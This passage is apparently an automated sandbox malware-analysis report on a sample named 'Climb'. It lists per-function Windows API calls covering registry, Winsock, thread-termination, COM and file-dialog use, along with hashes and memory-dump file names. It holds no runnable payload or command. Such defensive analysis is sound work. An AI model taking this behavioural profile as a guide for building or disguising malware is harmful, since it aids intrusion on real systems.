                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                      • String ID: nul
                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                      • Opcode ID: 857ac1f96189ac8e5829414e4bb1a68fc83106d7b9580cf4c9880ea9908c0820
                                                                                                                                                                      • Instruction ID: 504746a62c405caae6ef1e2eb954c58e117566c0616d62dcc83187994a513f3f
                                                                                                                                                                      • Opcode Fuzzy Hash: 857ac1f96189ac8e5829414e4bb1a68fc83106d7b9580cf4c9880ea9908c0820
                                                                                                                                                                      • Instruction Fuzzy Hash: 612181755007469BDF309F689C09AAABBF8BF55730F240A19FCA1E32D0D7719884DB64
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004F78B1
                                                                                                                                                                        • Part of subcall function 004F7873: GetStockObject.GDI32(00000011), ref: 004F78C5
                                                                                                                                                                        • Part of subcall function 004F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004F78CF
                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00584BB0
                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00584BBD
                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00584BC8
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00584BD7
                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00584BE3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                      • Opcode ID: e72a0aacee38319086bf79ae963fbbebf8941e368c1cc2f91eec78bdc69756df
                                                                                                                                                                      • Instruction ID: 48d26d147e56708597e1aebe8b8b70c43b83cdd17232f8b0cd01657b81e0cb50
                                                                                                                                                                      • Opcode Fuzzy Hash: e72a0aacee38319086bf79ae963fbbebf8941e368c1cc2f91eec78bdc69756df
                                                                                                                                                                      • Instruction Fuzzy Hash: D11163B155021EBEEF119F65CC85EEB7FADFF08798F014111BA18A6090CA75DC21DBA4
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0052DB23: _free.LIBCMT ref: 0052DB4C
                                                                                                                                                                      • _free.LIBCMT ref: 0052DBAD
                                                                                                                                                                        • Part of subcall function 00522D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4), ref: 00522D4E
                                                                                                                                                                        • Part of subcall function 00522D38: GetLastError.KERNEL32(005C1DC4,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4,005C1DC4), ref: 00522D60
                                                                                                                                                                      • _free.LIBCMT ref: 0052DBB8
                                                                                                                                                                      • _free.LIBCMT ref: 0052DBC3
                                                                                                                                                                      • _free.LIBCMT ref: 0052DC17
                                                                                                                                                                      • _free.LIBCMT ref: 0052DC22
                                                                                                                                                                      • _free.LIBCMT ref: 0052DC2D
                                                                                                                                                                      • _free.LIBCMT ref: 0052DC38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                      • Instruction ID: 7c6deb1f453328efa851d3b7fa04fca2e746ee753fceaee36289fb8d52bf8778
                                                                                                                                                                      • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                      • Instruction Fuzzy Hash: 81112E72581725B6D520BB70EC0EFCB7FACBF86700F410C19B2D9AA1D2D665A5054A60
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                      • String ID: j`U
                                                                                                                                                                      • API String ID: 2931989736-3304937784
                                                                                                                                                                      • Opcode ID: 7edaaaa4bb6486f090e9182ee58e7c2c56f4abe8ba740f4f0282a8537f520e11
                                                                                                                                                                      • Instruction ID: 0a80126a6e068f684cabce3d6c89eb16308a06af5e24ae214c512e6036e9e8a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 7edaaaa4bb6486f090e9182ee58e7c2c56f4abe8ba740f4f0282a8537f520e11
                                                                                                                                                                      • Instruction Fuzzy Hash: 8401B5B16007467BAA1066205C66FAFBB5DFE51399B004822FE099B3C1E761ED58C2A5
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0055E328
                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 0055E32F
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0055E345
                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 0055E34C
                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0055E390
                                                                                                                                                                      Strings
                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0055E36D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                                                                                      • Opcode ID: fe7102b9f1c3211527b834831ee50fc5d40e3712f05d15241b77d44a2bb3e77f
                                                                                                                                                                      • Instruction ID: 9270808f1e55ffc811a2546e823d196d52ce51aaeffede442889fdf64f91172d
                                                                                                                                                                      • Opcode Fuzzy Hash: fe7102b9f1c3211527b834831ee50fc5d40e3712f05d15241b77d44a2bb3e77f
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D0136F690020C7FE711ABA49D89EF77BBCEB08301F014592BB45F6091E6749E889B75
                                                                                                                                                                      APIs
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00561322
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?), ref: 00561334
                                                                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00561342
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00561350
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0056135F
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0056136F
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 00561376
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                      • Opcode ID: dc8c3c3a8d1e1674616615d7b5d06545772159c514f92f9d670af6d113e486ce
                                                                                                                                                                      • Instruction ID: 083deb53a717fa292539eaa5420ef226ef29485602b53647796e537d0168006f
                                                                                                                                                                      • Opcode Fuzzy Hash: dc8c3c3a8d1e1674616615d7b5d06545772159c514f92f9d670af6d113e486ce
                                                                                                                                                                      • Instruction Fuzzy Hash: EEF03C32142A02BBD3412F54EE4DBD6BB79FF14312F402421F502A28E0CB7594B8EFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0057281D
                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0057283E
                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 0057284F
                                                                                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00572938
                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 005728E9
                                                                                                                                                                        • Part of subcall function 0055433E: _strlen.LIBCMT ref: 00554348
                                                                                                                                                                        • Part of subcall function 00573C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0056F669), ref: 00573C9D
                                                                                                                                                                      • _strlen.LIBCMT ref: 00572992
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3203458085-0
                                                                                                                                                                      • Opcode ID: a0f59a2950be2bec9a5d6e4f6043ebc9f0882700c4ad67c3c7cd31fc049ed982
                                                                                                                                                                      • Instruction ID: ebe5194bd8932a108086ee31954a4d51ba5cd85a7ccc49ced09fc5d77ace659c
                                                                                                                                                                      • Opcode Fuzzy Hash: a0f59a2950be2bec9a5d6e4f6043ebc9f0882700c4ad67c3c7cd31fc049ed982
                                                                                                                                                                      • Instruction Fuzzy Hash: 23B1ED31604301AFD324DF24D885E2ABBE5BF84318F54894CF55A4B2E2DB71ED86DB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • __allrem.LIBCMT ref: 0052042A
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00520446
                                                                                                                                                                      • __allrem.LIBCMT ref: 0052045D
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0052047B
                                                                                                                                                                      • __allrem.LIBCMT ref: 00520492
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005204B0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                      • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                      • Instruction ID: ae02865f3e97a9920eb43b69beeab09ff511ae6ff2348a36a559eeffb3f91eff
                                                                                                                                                                      • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                      • Instruction Fuzzy Hash: AA811E716017269BEB20EE68EC45B6FBBA4BF96320F14952AF511D76C3E770D9008790
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00518649,00518649,?,?,?,005267C2,00000001,00000001,8BE85006), ref: 005265CB
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005267C2,00000001,00000001,8BE85006,?,?,?), ref: 00526651
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0052674B
                                                                                                                                                                      • __freea.LIBCMT ref: 00526758
                                                                                                                                                                        • Part of subcall function 00523B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00516A79,?,0000015D,?,?,?,?,005185B0,000000FF,00000000,?,?), ref: 00523BC5
                                                                                                                                                                      • __freea.LIBCMT ref: 00526761
                                                                                                                                                                      • __freea.LIBCMT ref: 00526786
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                      • Opcode ID: 4e036777d273c6376904d65a35f64e4e0c6f5f0eb14d64151c6bb99fd39fff7f
                                                                                                                                                                      • Instruction ID: 1c476f2e0a975fbc48c0ba8303c3578b0378acd6070648a3e06ad5b78be9de23
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e036777d273c6376904d65a35f64e4e0c6f5f0eb14d64151c6bb99fd39fff7f
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F51D672600226AFDB254F64EC85EAB7FA9FF82754F184669FC05D61C0EB35DC50C6A0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 0057D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D451
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4C8
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4FE
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057C72A
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0057C785
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0057C7CA
                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0057C7F9
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0057C853
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0057C85F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1120388591-0
                                                                                                                                                                      • Opcode ID: 59c7fc0b1ce9a4d0bfd05a752168511711083bd3d1509682f6b6868abd08d578
                                                                                                                                                                      • Instruction ID: 35af83aaff2349bcd56172e706f12a06a6b6bd5759291086063c42ea11c9113b
                                                                                                                                                                      • Opcode Fuzzy Hash: 59c7fc0b1ce9a4d0bfd05a752168511711083bd3d1509682f6b6868abd08d578
                                                                                                                                                                      • Instruction Fuzzy Hash: 48819970208241AFC714DF24D885E2ABFE5FF84308F14889DF5598B2A2DB31ED46DB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • VariantInit.OLEAUT32(00000035), ref: 005500A9
                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00550150
                                                                                                                                                                      • VariantCopy.OLEAUT32(00550354,00000000), ref: 00550179
                                                                                                                                                                      • VariantClear.OLEAUT32(00550354), ref: 0055019D
                                                                                                                                                                      • VariantCopy.OLEAUT32(00550354,00000000), ref: 005501A1
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005501AB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3859894641-0
                                                                                                                                                                      • Opcode ID: b94fdaa0fb0425de3ff4bd7142c110bbb85b6659427ab3169ae3210d44fcf0aa
                                                                                                                                                                      • Instruction ID: e6aca34c53229bd571fdb3c600f001e3a08e2ac675fbd6b155ccf937316039c1
                                                                                                                                                                      • Opcode Fuzzy Hash: b94fdaa0fb0425de3ff4bd7142c110bbb85b6659427ab3169ae3210d44fcf0aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 77512A35500311A6DF10AB64D8ADB29BBA4FF45312F50A847EC05DF2D6DB709C88CB56
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00569F2A
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00569F4B
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00569F72
                                                                                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00569FCA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                      • String ID: X
                                                                                                                                                                      • API String ID: 83654149-3081909835
                                                                                                                                                                      • Opcode ID: 93fc6ece8be867d83e750125a33f397523e88a216d19658b28fcd431e0ef9524
                                                                                                                                                                      • Instruction ID: 7c05f4e8da61ef0af27c68a3034f6a4c81605efe002410d26118bd3538e1017d
                                                                                                                                                                      • Opcode Fuzzy Hash: 93fc6ece8be867d83e750125a33f397523e88a216d19658b28fcd431e0ef9524
                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE1C1315043009FD724EF25C885A6ABBF4FF85314F04896DF9899B2A2DB35ED05CB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00566F21
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0056707E
                                                                                                                                                                      • CoCreateInstance.OLE32(00590CC4,00000000,00000001,00590B34,?), ref: 00567095
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00567319
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                      • String ID: .lnk
